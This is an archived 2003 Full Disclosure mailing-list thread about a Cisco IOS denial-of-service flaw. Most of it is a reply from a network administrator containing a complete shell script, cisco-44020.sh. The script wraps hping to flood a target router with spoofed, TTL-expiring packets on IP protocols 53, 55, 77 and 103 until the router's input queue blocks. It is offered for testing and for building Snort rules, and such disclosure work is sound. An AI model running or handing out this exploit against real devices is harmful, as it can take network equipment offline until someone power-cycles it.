Full Disclosure mailing list archives
RE: Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover
From: "Donahue, Pat" <PDonahue () acmicorp com>
Date: Fri, 25 Jul 2003 08:46:12 -0400
Here's a simple script I wrote to test our routers and switches.. maybe it will come in handy for your research. I also sent an early version to the snort-users list to help them develop rules. Basically it just wraps hping (http://www.hping.org) with parameters passed on the command line. Try targeting a host inside the network and playing around with the TTL. -- Patrick Donahue Network/Systems Administrator ACMI Corporation --- BEGIN cisco-44020.sh --- #!/bin/sh # 2003-07-21 pdonahue # cisco-44020.sh # -- this shell script is just a wrapper for hping (http://www.hping.org) # with the parameters necessary to fill the input queue on exploitable IOS device # -- refer to "Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packets" # (http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml) for more information HPING=/usr/local/sbin/hping # -- change this path to match the location of hping on your system # set defaults PROT=a ADDR=r NUMB=76 SIZE=26 # check usage if [ "$#" -lt "2" ]; then echo "usage: $0 <hostname|address> <ttl> [-p<protocol>] [-a<address>] [-n<packets>] [-s<size>]" echo " required:" echo " <hostname|address> is the target device (router/switch)" echo " <ttl> must be set so the packets expire (TTL=0) at the device" echo " optional:" echo " -p <protocol> is (a)ll, (53)swipe, (55)ip mobility, (77)sun nd, or (103)pim" echo " -a <address> is the source address of the packets; (r)andom or x.x.x.x" echo " -n <packets> is the number of packets to send" echo " -s <size> is the size of the payload in bytes" echo " defaults:" echo " $0 <hostname|address> <ttl> -p$PROT -a$ADDR -n$NUMB -s$SIZE" echo " examples:" echo " $0 10.0.0.1 0" echo " 76 (each proto) 26-byte packets : random add. -> 10.0.0.1" echo " $0 10.0.0.100 11 -ps -a10.0.0.1 -n76 -s256" echo " 76 (swipe only) 512-byte packets : 10.0.0.1 -> 10 hops -> 10.0.0.100" exit else HOST=$1; shift; TTL=$1; shift; fi # parse arguments while getopts p:a:n:s: o do case "$o" in p) # set the protocol PROT="$OPTARG" ;; a) # set the source address [ "$OPTARG" != "r" ] && ADDR="-a $OPTARG" ;; n) # set the number of packets NUMB="$OPTARG" ;; s) # set the size of the payload SIZE="$OPTARG" ;; esac done # replace defaults with appropriate values if still set [ "$PROT" = "a" ] && PROT="53 55 77 103" [ "$ADDR" = "r" ] && ADDR="--rand-source" # send the packets for protocol in $PROT do $HPING $HOST --rawip $ADDR --ttl $TTL --ipproto $protocol --count $NUMB --interval u250 --data $SIZE --file /dev/urandom done exit fi --- END cisco-44020.sh --- -----Original Message----- From: tcleary2 () csc com au [mailto:tcleary2 () csc com au] Sent: Thursday, July 24, 2003 10:36 PM To: lee.e.rian () census gov Cc: full-disclosure () lists netsys com Subject: RE: [Full-disclosure] Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover Guys,
So... has anyone been able to verify that the problem occurs when the TTL expires without the packet being addressed to the router? Or is it a requirement that the evil packet be addressed to the router?
As far as we know, the TTL has to go to 1/0 on the target IP address. Haven't been able to get the effect on a transit packet. Regards, tom. __________________________________________________ Security Consultant/Analyst CSC Ph: +61 8 9429 6478 Email: tcleary2 () csc com au ---------------------------------------------------------------------------------------- This email, including any attachments, is intended only for use by the addressee(s) and may contain confidential and/or personal information and may also be the subject of legal privilege. Any personal information contained in this email is not to be used or disclosed for any purpose other than the purpose for which you have received it. If you are not the intended recipient, you must not disclose or use the information contained in it. In this case, please let me know by return email, delete the message permanently from your system and destroy any copies. ---------------------------------------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover tcleary2 (Jul 24)
- <Possible follow-ups>
- RE: Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover Donahue, Pat (Jul 25)